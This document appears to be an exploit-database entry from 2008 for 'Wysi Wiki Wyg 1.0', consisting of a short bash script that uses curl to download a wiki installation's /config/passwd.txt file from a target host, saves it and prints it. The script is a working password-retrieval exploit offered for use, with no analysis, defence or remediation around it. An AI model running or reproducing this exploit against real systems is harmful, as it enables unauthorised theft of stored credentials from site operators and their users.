id: 4428
date: 12/12/2008
title: Wysi Wiki Wyg 1.0 Remote Password Retrieve Exploit
author: StAkeR
cves: 

==================================================
Wysi Wiki Wyg 1.0 Remote Password Retrieve Exploit
==================================================


#!/bin/bash
# Wysi Wiki Wyg 1.0 Remote Password Retrieve Exploit
# by athos - staker

host=$1;
name=$2;
path='/config/passwd.txt';

if [ "$name" = "" ]; then
        echo "Usage: bash $0 [host/path] [filename]";
        echo "by athos - staker[at]hotmail[dot]it";
        exit;
fi;      

curl $host/$path > $name;
clear
cat $name;




#  0day.today [2023-03-25]  #